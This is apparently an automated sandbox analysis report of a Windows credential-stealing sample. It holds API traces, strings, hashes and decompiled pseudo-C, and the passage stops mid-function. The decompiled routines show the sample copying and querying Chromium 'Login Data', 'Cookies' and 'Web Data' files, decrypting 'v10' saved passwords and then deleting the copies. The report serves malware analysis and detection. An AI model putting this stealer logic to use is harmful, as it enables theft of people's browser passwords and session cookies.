0x00407936
0x00407938
0x00407941
0x0040794f
0x0040794f
0x0040795d
0x00407968
0x0040796b
0x0040796e
0x00407970
0x00407974
0x00000000
0x00000000
0x00407976
0x0040797e
0x00407981
0x00407981
0x0040798a
0x0040798b
0x00407991
0x00000000
0x00407993
0x004079a6
0x004079a9
0x004079b2
0x004079c9
0x004079cc
0x004079d3
0x00407c45
0x00407c48
0x00407c4f
0x00407c57
0x00407c57
0x004079de
0x004079ee
0x004079f1
0x004079f5
0x004079ff
0x00407a01
0x00407a01
0x004079fb
0x00407a15
0x00407a1e
0x00407a21
0x00407a33
0x00407a4a
0x00407a4c
0x00407a5f
0x00407a6b
0x00407a6d
0x00407a75
0x00407a7a
0x00407a82
0x00407a90
0x00407a93
0x00407a9f
0x00407aa1
0x00407aa9
0x00407aae
0x00407abe
0x00407ac1
0x00407ae4
0x00407aea
0x00407afa
0x00407b01
0x00407b0a
0x00407b11
0x00407b19
0x00407b26
0x00407b28
0x00407b2d
0x00407b33
0x00407b39
0x00407b44
0x00407b46
0x00407b4b
0x00407b5a
0x00407b63
0x00407b66
0x00407b75
0x00407b8a
0x00407b77
0x00407b7a
0x00407b81
0x00407b87
0x00407b8e
0x00407b8e
0x00407b98
0x00407ba1
0x00407baa
0x00407bb3
0x00407bbc
0x00407bd6
0x00407be5
0x00407beb
0x00407beb
0x00407bf3
0x00407bfb
0x00407c00
0x00407c05
0x00407c08
0x00407c08
0x00407c0e
0x00407c12
0x00407c19
0x00407c1f
0x00407c24
0x00407c27
0x00407c27
0x00407c2d
0x00407c31
0x00407c38
0x00407c3f
0x00000000
0x00407a35
0x00407a37
0x00407a37
0x00000000
0x00407a33
0x00407991
0x0040799e
0x004079a0
0x00000000
0x004079a0
0x004077b0
0x004077b5
0x004077b5
0x004077bc
0x004077c2
0x004077c7
0x00000000
0x00000000
0x004077c9
0x004077d2
0x00000000
0x00000000
0x00000000
0x004077d2
0x00000000

APIs

Part of subcall function 0040100B: LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
Part of subcall function 0040100B: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
Part of subcall function 0040100B: LoadLibraryW.KERNELBASE(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
Part of subcall function 0040100B: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8

CoInitialize.OLE32(00000000), ref: 00407783

Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 004077EE
ExitProcess.KERNEL32 ref: 004077F8
LocalFree.KERNEL32(00000000), ref: 004078FD
LocalFree.KERNEL32(00000000), ref: 00407904
LocalFree.KERNEL32(00000000), ref: 0040790B
LocalFree.KERNEL32(00000000), ref: 00407976
LocalFree.KERNEL32(00000000), ref: 00407981
LocalFree.KERNEL32(00000000), ref: 004079A0
LocalFree.KERNEL32(?), ref: 004079A9
LocalFree.KERNEL32(?), ref: 004079B2
ExitProcess.KERNEL32 ref: 00407A01
ExitProcess.KERNEL32 ref: 00407A37

Strings

, xrefs: 00407817
, xrefs: 00407842
, xrefs: 00407823
xzn, xrefs: 00407A6D, 00407AA1
afb5c633c4650f69312baef49db9dfa4, xrefs: 00407789
iqroq5112542785672901323, xrefs: 004077D9, 004077DE, 004077EB
, xrefs: 0040782F

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$LibraryLoad$ExitProcess$AddressProc$AllocByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $afb5c633c4650f69312baef49db9dfa4$iqroq5112542785672901323$xzn
API String ID: 1492179042-1705126799
Opcode ID: 0a0d8b2567dfd511483fd131902667ad1f2beff92a239810d1cd299ce7c42da3
Instruction ID: e92a4b87a1a530e7256a75f8bb231f7b298302859da8ec0d9ad369049daf7dae
Opcode Fuzzy Hash: 0a0d8b2567dfd511483fd131902667ad1f2beff92a239810d1cd299ce7c42da3
Instruction Fuzzy Hash: 25D18571E00214ABDB04ABB6DE49E6E77B5AF48310B10483AF905B73D1DF78AD118B5E

Uniqueness

Uniqueness Score: -1.00%

Function 022BEB40 Relevance: 3.2, APIs: 2, Instructions: 236
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 022BEB86
VirtualProtect.KERNELBASE(?,?,00000000), ref: 022BEDD0

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction ID: 20dbecf73766e2a0432239d547d0fef44368e9e0a542c50839802466f9b9d5a7
Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction Fuzzy Hash: 8AB1A9B5A00209DFCB09CF88C891EEEBBB6BF88354F558558E9099B355D770E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 022BE620 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 022BE6A4

Strings

VirtualAlloc, xrefs: 022BE689, 022BE68C

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 9fd8f2654060b4702380c08b5683a4a90e1624a5d3e2aa0ef0ba12fe39154f72
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 09110060D08389DAEF01D7E894097FEBFB55F11704F044098D9457A282D6BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402CB8 Relevance: 51.2, APIs: 19, Strings: 10, Instructions: 440
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalFree.KERNEL32(00000000), ref: 00402D47

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

StrCpyW.SHLWAPI(?,?), ref: 00402D87
LocalFree.KERNEL32(00000000), ref: 00402D92
LocalFree.KERNEL32(00000000), ref: 00402DA1
LocalFree.KERNEL32(00000000), ref: 00402DB0
LocalFree.KERNEL32(00000000), ref: 00402DBF
LocalFree.KERNEL32(00000000), ref: 00402DCA
DeleteFileW.KERNEL32(?), ref: 00402F30
LocalFree.KERNEL32(?), ref: 00402F37
LocalFree.KERNEL32(00000000), ref: 00402F4F
wsprintfW.USER32 ref: 00403102
lstrlenW.KERNEL32(00000000), ref: 0040310C
wsprintfW.USER32 ref: 004031A6
lstrlenW.KERNEL32(00000000), ref: 004031B0
LocalFree.KERNEL32(00000000), ref: 004031CB
LocalFree.KERNEL32(?), ref: 004031D4
LocalFree.KERNEL32(00000000), ref: 004031E2
LocalFree.KERNEL32(00000000), ref: 004031EC
DeleteFileW.KERNEL32(?), ref: 00403223

Strings

TRUE, xrefs: 004030EA, 004030F5, 0040318C, 00403199
Network\Cookies, xrefs: 00402DE0
FALSE, xrefs: 004030E5, 00403191
x|n, xrefs: 00402E60
X~n, xrefs: 00402E75
v10, xrefs: 0040308D
8~n, xrefs: 00402E9F
pll, xrefs: 00402F05
Cookies, xrefs: 00402DE9
x}n, xrefs: 00402E8A

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFilelstrlenwsprintf
String ID: 8~n$Cookies$FALSE$Network\Cookies$TRUE$X~n$pll$v10$x|n$x}n
API String ID: 2479234762-2640070623
Opcode ID: ca82027ae101a843b685d125fad7f84f8d5a922713a545ea654940957bcd5cc7
Instruction ID: 518071ebf78736c82c0705b89313a0bc18143e80e42b499cd2370e7bd490f6e3
Opcode Fuzzy Hash: ca82027ae101a843b685d125fad7f84f8d5a922713a545ea654940957bcd5cc7
Instruction Fuzzy Hash: A3024C71900219EFDF059FA2EE49AAE7BB5FB08301F104839E911B72A0D7759D20DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004027B8 Relevance: 51.2, APIs: 22, Strings: 7, Instructions: 419
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E004027B8(intOrPtr* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				void* _v16;
				WCHAR* _v20;
				void* _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v80;
				void* _v84;
				char _v88;
				void* _t103;
				void* _t104;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				void* _t134;
				void* _t135;
				void* _t137;
				void* _t146;
				void* _t153;
				void* _t154;
				signed int _t155;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t160;
				void* _t161;
				WCHAR* _t165;
				void* _t173;
				void* _t174;
				int _t175;
				void* _t184;
				int _t185;
				void* _t190;
				void* _t199;
				intOrPtr* _t203;
				void* _t204;
				intOrPtr* _t205;
				void* _t253;
				signed int _t255;
				void* _t258;
				void* _t259;
				void* _t260;
				char _t261;
				void* _t263;
				void* _t265;
				signed int _t266;
				void* _t267;
				intOrPtr* _t270;
				void* _t271;

				_t203 = __edx;
				_v44 = __ecx;
				_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_t104 =  *((intOrPtr*)( *0x40e13c))(_t103, _a12);
				_v8 = _v8 & 0x00000000;
				_t253 = _t104;
				E004017FA(_t253,  &_v8,  &_v52);
				 *_t270 = 0x200;
				_t259 =  *((intOrPtr*)( *0x40e044))(0x40);
				_v48 = _t259;
				E00401934(_v8,  &_v48,  *0x40e044, _v52);
				_v28 = _v28 & 0x00000000;
				_v60 = _t259;
				_v64 = 0x200;
				_t260 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_v24 = _t260;
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				_push( &_v72);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v64);
				if( *((intOrPtr*)( *0x40e0b0))() != 0) {
					_t199 = E0040177F(_v68,  &_v24, _v72);
					_t260 = _v24;
					if(_t199 != 0) {
						 *_t203 =  *((intOrPtr*)( *0x40e13c))( *_t203, _t260);
					}
				}
				if(_v28 != 0) {
					LocalFree(_v28);
				}
				if(_v60 != 0) {
					LocalFree(_v60);
				}
				if(_v68 != 0) {
					LocalFree(_v68);
				}
				if(_t260 != 0) {
					LocalFree(_t260);
				}
				if(_t253 != 0) {
					LocalFree(_t253);
				}
				_t261 = _a16;
				if(_t261 == 0) {
					L57:
					return 0;
				} else {
					_t118 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c4);
					 *0x40e4d4 = _t118;
					_t120 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1f8);
					 *0x40e4c8 = _t120;
					_t122 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1e0);
					 *0x40e4bc = _t122;
					_t124 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e208);
					 *0x40e4c4 = _t124;
					_t126 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e230);
					 *0x40e4cc = _t126;
					_t128 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1c0);
					 *0x40e4b8 = _t128;
					_t130 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e224);
					 *0x40e4c0 = _t130;
					 *0x40e4d0 =  *((intOrPtr*)( *0x40e0d4))(_t261,  *0x40e1b0);
					_t134 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t135 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_v32 = _t135;
					_t263 =  *((intOrPtr*)( *0x40e000))(_t134, _a8, L"Login Data");
					_v56 = _t263;
					_t137 = E0040A69E( *0x40e000,  &_v32);
					_t204 = _v32;
					if(_t137 == 0) {
						L59:
						LocalFree(_t263);
						DeleteFileW(_t204);
						return LocalFree(_t204) | 0xffffffff;
					}
					_push(0);
					_push(_t204);
					_push(_t263);
					if( *((intOrPtr*)( *0x40e184))() == 0) {
						goto L59;
					}
					_push( &_v24);
					_push(_t204);
					if( *0x40e4c8() == 0) {
						if(_v24 != 0) {
							_t146 =  *0x40e4d4(_v24,  *0x40e1fc, 0xffffffff,  &_a16, 0);
							_t271 = _t270 + 0x14;
							if(_t146 == 0) {
								_push(_a16);
								if( *0x40e4cc() != 0x64) {
									L53:
									if(_t263 != 0) {
										LocalFree(_t263);
									}
									 *0x40e4bc(_a16);
									 *0x40e4c4(_v24);
									DeleteFileW(_t204);
									if(_t204 != 0) {
										LocalFree(_t204);
									}
									goto L57;
								}
								_t205 = _v44;
								do {
									_t153 =  *0x40e4c0(_a16, 0);
									_t154 =  *0x40e4c0(_a16, 1);
									_v48 = _t154;
									_t155 =  *0x40e4c0(_a16, 2);
									_t271 = _t271 + 0x18;
									_t255 = _t155;
									if(_t153 >= 1 && (_v48 >= 1 || _t255 >= 1)) {
										_t157 =  *0x40e4b8(_a16, 0);
										_v44 = _t157;
										_t158 =  *0x40e4b8(_a16, 1);
										_t271 = _t271 + 0x10;
										_v40 = _t158;
										if(_t255 <= 0) {
											goto L51;
										}
										_t265 =  *0x40e4d0(_a16, 2);
										_t54 = _t255 + 0x40; // 0x40
										_v36 = _t265;
										_t160 =  *((intOrPtr*)( *0x40e044))(0x40, _t54);
										_t161 =  *((intOrPtr*)( *0x40e050))(_t160, _t265);
										_v48 = _t161;
										_v12 =  *_t161;
										_v11 =  *((intOrPtr*)(_t161 + 1));
										_v10 =  *((intOrPtr*)(_t161 + 2));
										_v9 = 0;
										if(_t265 == 0) {
											L50:
											LocalFree(_t161);
											goto L51;
										}
										_t266 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
										_t165 =  *0x40e1a4; // 0x6d7778
										_v20 = _t165;
										_push("v10");
										_push( &_v12);
										_v8 = _t266;
										if( *((intOrPtr*)( *0x40e084))() != 0) {
											_push( &_v80);
											_v84 = _v36;
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_v88 = 0x200;
											_push( &_v88);
											if( *((intOrPtr*)( *0x40e0b0))() == 0) {
												_t267 = _v8;
												L47:
												if(_t267 != 0) {
													LocalFree(_t267);
												}
												_t161 = _v48;
												goto L50;
											}
											 *((char*)(_v80 + _v76)) = 0;
											_t173 = E0040A4C2(_v76);
											_v36 = _t173;
											_t174 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _t173);
											_t271 = _t271 + 0x14;
											_t175 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t174 >= _t175) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
											if(_v76 != 0) {
												LocalFree(_v76);
											}
											LocalFree(_v36);
											L39:
											goto L47;
										}
										_v16 =  *((intOrPtr*)( *0x40e044))(0x40, _t255 << 2);
										if(E0040177F(_v36,  &_v16, _t255) == 0) {
											_t267 = _v8;
										} else {
											_t184 =  *((intOrPtr*)( *0x40e0ec))(_t266, _v20, _v44, _v40, _v16);
											_t271 = _t271 + 0x14;
											_t185 = lstrlenW(_v20);
											_t267 = _v8;
											if(_t184 >= _t185) {
												 *_t205 = E0040A503( *_t205, _t267);
											}
										}
										if(_v16 == 0) {
											goto L47;
										} else {
											LocalFree(_v16);
											goto L39;
										}
									}
									L51:
									_push(_a16);
								} while ( *0x40e4cc() == 0x64);
								_t204 = _v32;
								_t263 = _v56;
								goto L53;
							}
							LocalFree(_t263);
							LocalFree(_t204);
							 *0x40e4c4(_v24);
							_t190 = 0xfffffffd;
							return _t190;
						}
						_t258 = 0xfffffffe;
						L22:
						LocalFree(_t263);
						LocalFree(_t204);
						return _t258;
					}
					_t258 = 0xffffffffffffffff;
					goto L22;
				}
			}

0x004027cd
0x004027cf
0x004027d2
0x004027de
0x004027e0
0x004027e7
0x004027ef
0x004027fa
0x00402808
0x00402811
0x00402814
0x0040281e
0x0040282b
0x0040282e
0x0040283b
0x0040283d
0x00402840
0x00402845
0x00402845
0x00402854
0x00402857
0x00402858
0x00402859
0x0040285a
0x0040285e
0x00402862
0x00402867
0x00402872
0x00402877
0x0040287d
0x00402889
0x00402889
0x0040287d
0x0040288f
0x00402894
0x00402894
0x0040289e
0x004028a3
0x004028a3
0x004028ad
0x004028b2
0x004028b2
0x004028ba
0x004028bd
0x004028bd
0x004028c5
0x004028c8
0x004028c8
0x004028ce
0x004028d3
0x00402c97
0x00000000
0x004028d9
0x004028e5
0x004028ed
0x004028f8
0x00402900
0x0040290b
0x00402913
0x0040291e
0x00402926
0x00402931
0x00402939
0x00402944
0x0040294c
0x00402957
0x0040295f
0x00402971
0x0040297e
0x0040298b
0x0040299b
0x004029a1
0x004029a6
0x004029a9
0x004029ae
0x004029b3
0x00402c9e
0x00402c9f
0x00402ca6
0x00000000
0x00402cb3
0x004029bf
0x004029c1
0x004029c2
0x004029c7
0x00000000
0x00000000
0x004029d0
0x004029d1
0x004029dc
0x004029e7
0x00402a12
0x00402a18
0x00402a1d
0x00402a3f
0x00402a4c
0x00402c66
0x00402c68
0x00402c6b
0x00402c6b
0x00402c74
0x00402c7d
0x00402c86
0x00402c8e
0x00402c91
0x00402c91
0x00000000
0x00402c8e
0x00402a52
0x00402a55
0x00402a5a
0x00402a67
0x00402a72
0x00402a75
0x00402a7b
0x00402a7e
0x00402a83
0x00402a9d
0x00402aa8
0x00402aab
0x00402ab1
0x00402ab4
0x00402ab9
0x00000000
0x00000000
0x00402ad0
0x00402ad4
0x00402ad7
0x00402add
0x00402ae7
0x00402ae9
0x00402aee
0x00402af4
0x00402afa
0x00402afd
0x00402b03
0x00402c46
0x00402c47
0x00000000
0x00402c47
0x00402b1d
0x00402b1f
0x00402b24
0x00402b2a
0x00402b2f
0x00402b30
0x00402b37
0x00402bb6
0x00402bb9
0x00402bc1
0x00402bc2
0x00402bc3
0x00402bc4
0x00402bc5
0x00402bc9
0x00402bd0
0x00402bd5
0x00402c35
0x00402c38
0x00402c3a
0x00402c3d
0x00402c3d
0x00402c43
0x00000000
0x00402c43
0x00402bdd
0x00402be1
0x00402bf6
0x00402c00
0x00402c02
0x00402c0a
0x00402c0e
0x00402c11
0x00402c1c
0x00402c1c
0x00402c22
0x00402c27
0x00402c27
0x00402ba5
0x00402ba5
0x00000000
0x00402ba5
0x00402b50
0x00402b5b
0x00402b95
0x00402b5d
0x00402b75
0x00402b77
0x00402b7f
0x00402b83
0x00402b86
0x00402b91
0x00402b91
0x00402b86
0x00402b9c
0x00000000
0x00402ba2
0x00402ba5
0x00000000
0x00402ba5
0x00402b9c
0x00402c4d
0x00402c4d
0x00402c57
0x00402c60
0x00402c63
0x00000000
0x00402c63
0x00402a20
0x00402a27
0x00402a30
0x00402a39
0x00000000
0x00402a39
0x004029eb
0x004029ec
0x004029ed
0x004029f4
0x00000000
0x004029fa
0x004029de
0x00000000
0x004029de

APIs

LocalFree.KERNEL32(00000000), ref: 00402845

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00402894
LocalFree.KERNEL32(00000000), ref: 004028A3
LocalFree.KERNEL32(00000000), ref: 004028B2
LocalFree.KERNEL32(00000000), ref: 004028BD
LocalFree.KERNEL32(00000000), ref: 004028C8
LocalFree.KERNEL32(00000000), ref: 004029ED
LocalFree.KERNEL32(?), ref: 004029F4
LocalFree.KERNEL32(00000000), ref: 00402A20
LocalFree.KERNEL32(?), ref: 00402A27
LocalFree.KERNEL32(00000000), ref: 00402C9F
DeleteFileW.KERNEL32(?), ref: 00402CA6
LocalFree.KERNEL32(?), ref: 00402CAD

Strings

Login Data, xrefs: 00402993
x|n, xrefs: 004028FA
X~n, xrefs: 00402933
v10, xrefs: 00402B2A
8~n, xrefs: 00402959
xwm, xrefs: 00402B1F
x}n, xrefs: 00402946

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: 8~n$Login Data$X~n$v10$xwm$x|n$x}n
API String ID: 2194112602-375403254
Opcode ID: 18e78e8ff6f735b836f31b0206ae2e491e165408470930e53818c058bcf09315
Instruction ID: 1f8185af0f1f67a55c4789a30ea30f5b3919f5d8761e9684d4856192d3457fc8
Opcode Fuzzy Hash: 18e78e8ff6f735b836f31b0206ae2e491e165408470930e53818c058bcf09315
Instruction Fuzzy Hash: 25F18071900225EFDB05DFA6DE48AAE7BB5FB08310F144935F515B72E0CBB89920CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403236 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 437fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 004032C3

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00403312
LocalFree.KERNEL32(00000000), ref: 00403321
LocalFree.KERNEL32(00000000), ref: 00403330
LocalFree.KERNEL32(00000000), ref: 0040333B
LocalFree.KERNEL32(00000000), ref: 00403346
LocalFree.KERNEL32(00000000), ref: 0040346B
LocalFree.KERNEL32(?), ref: 00403472
LocalFree.KERNEL32(00000000), ref: 0040349E
LocalFree.KERNEL32(?), ref: 004034A5
LocalFree.KERNEL32(00000000), ref: 00403747
DeleteFileW.KERNEL32(?), ref: 0040374E
LocalFree.KERNEL32(?), ref: 00403755

Strings

Web Data, xrefs: 00403411
v10, xrefs: 004035CA

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: Web Data$v10
API String ID: 2194112602-1846122625
Opcode ID: 95a4d13152d61a2150443ef15e5531f8b924340940afcc281ea8c97043dcaaac
Instruction ID: dd7c25951b04004103893565f422d3d2245e9c7bd2d4e4275fc45d8d731e42ae
Opcode Fuzzy Hash: 95a4d13152d61a2150443ef15e5531f8b924340940afcc281ea8c97043dcaaac
Instruction Fuzzy Hash: A2F1A171900214EFDB15DFA6EE44AAE7BB9FB08311F104839F511B72A0DB759A20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405B5B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 372
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00405B5B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36, intOrPtr _a40, char _a44) {
				void* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				char _v620;
				signed int _v632;
				unsigned int _v636;
				signed int _v664;
				void* __ebx;
				void* __esi;
				void* _t112;
				signed int _t114;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				WCHAR* _t122;
				WCHAR* _t125;
				void* _t127;
				WCHAR* _t129;
				intOrPtr _t135;
				WCHAR* _t136;
				void* _t138;
				void* _t140;
				signed int _t144;
				signed int _t148;
				WCHAR* _t151;
				WCHAR* _t158;
				WCHAR* _t162;
				void* _t167;
				unsigned int _t175;
				WCHAR* _t177;
				WCHAR* _t182;
				void* _t186;
				WCHAR* _t189;
				WCHAR* _t192;
				void* _t194;
				void* _t195;
				WCHAR* _t196;
				void* _t201;
				void* _t202;
				char* _t232;
				intOrPtr _t233;
				intOrPtr _t239;
				WCHAR* _t245;
				intOrPtr _t249;
				signed int _t251;
				signed int _t252;
				WCHAR* _t253;
				void* _t254;
				void* _t255;
				void* _t259;
				void* _t260;
				unsigned int _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;

				_t1 =  &_a44; // 0x406321
				_t249 =  *_t1;
				_v44 = __edx;
				_v40 = __ecx;
				if(_t249 <= _a40) {
					_v16 = _v16 & 0x00000000;
					_t112 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
					_t195 =  *((intOrPtr*)( *0x40e13c))(_t112, _a4);
					_v52 = _t195;
					_t114 =  *((intOrPtr*)( *0x40e08c))(_t195);
					_t201 = 0x5c;
					__eflags =  *((intOrPtr*)(_t195 + _t114 * 2 - 2)) - _t201;
					_t202 = _t195;
					if( *((intOrPtr*)(_t195 + _t114 * 2 - 2)) == _t201) {
						_push( *0x40e3d0);
						_v16 = 1;
					} else {
						_push( *0x40e1d0);
					}
					E0040188C(_t195, _t202, 0x104, _t259);
					_t117 =  *((intOrPtr*)( *0x40e018))(_t195,  &_v664);
					_v36 = _t117;
					__eflags = _t117 - 0xffffffff;
					if(_t117 != 0xffffffff) {
						_t260 = _v36;
						_t196 = _v16;
						do {
							__eflags = _v664 & 0x00000010;
							if((_v664 & 0x00000010) == 0) {
								_t119 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
								_t120 =  *((intOrPtr*)( *0x40e13c))(_t119, _a4);
								__eflags = _t196;
								if(_t196 == 0) {
									_t233 =  *0x40e258; // 0x6e7a78
									_t120 = E0040A503(_t120, _t233);
								}
								_t232 =  &_v620;
								_t121 = E0040A503(_t120, _t232);
								_t261 = _v636;
								_t251 = _v632;
								__eflags = _a24;
								_v12 = _t121;
								if(_a24 == 0) {
									_t122 = 0;
									__eflags = 0;
								} else {
									_t232 = L"*.lnk";
									_t122 = E0040A70E( &_v620, _t232);
								}
								__eflags = _v12;
								_v28 = _t122;
								if(_v12 == 0) {
									L52:
									LocalFree(_v12);
									goto L53;
								} else {
									_t135 = _a28;
									_t252 = (_t261 << 0x00000020 | _t251) >> 0xa;
									asm("cdq");
									__eflags = _t261 >> 0xa - _t232;
									if(__eflags > 0) {
										goto L52;
									}
									if(__eflags < 0) {
										L23:
										_t136 = E0040A70E( &_v620, _a12);
										__eflags = _t136;
										if(_t136 == 0) {
											L25:
											_t253 = _v28;
											__eflags = _t253;
											if(_t253 == 0) {
												goto L52;
											}
											L28:
											_t138 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_t140 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t138,  *0x40e1b8), _v40);
											_t239 =  *0x40e1b8; // 0x6e7bf8
											_v20 = E0040A503(E0040A503(_t140, _t239), _v44);
											__eflags = _t253;
											if(_t253 == 0) {
												_t264 = 0;
												__eflags = 0;
											} else {
												_t264 = E00408FA5(_v12);
											}
											_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
											_v16 = _t144;
											_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
											__eflags = _t253;
											if(_t253 != 0) {
												_t186 =  *((intOrPtr*)( *0x40e08c))(_t264);
												__eflags = _t186 - 4;
												if(_t186 > 4) {
													_t189 =  *((intOrPtr*)( *0x40e0e0))(_t264, 0, 0x5c) + 2;
													__eflags = _t189;
													StrCpyW(_v32, _t189);
												}
											}
											_t148 =  *((intOrPtr*)( *0x40e08c))(_a8);
											__eflags = _t253;
											_t150 =  !=  ? _v32 : 0;
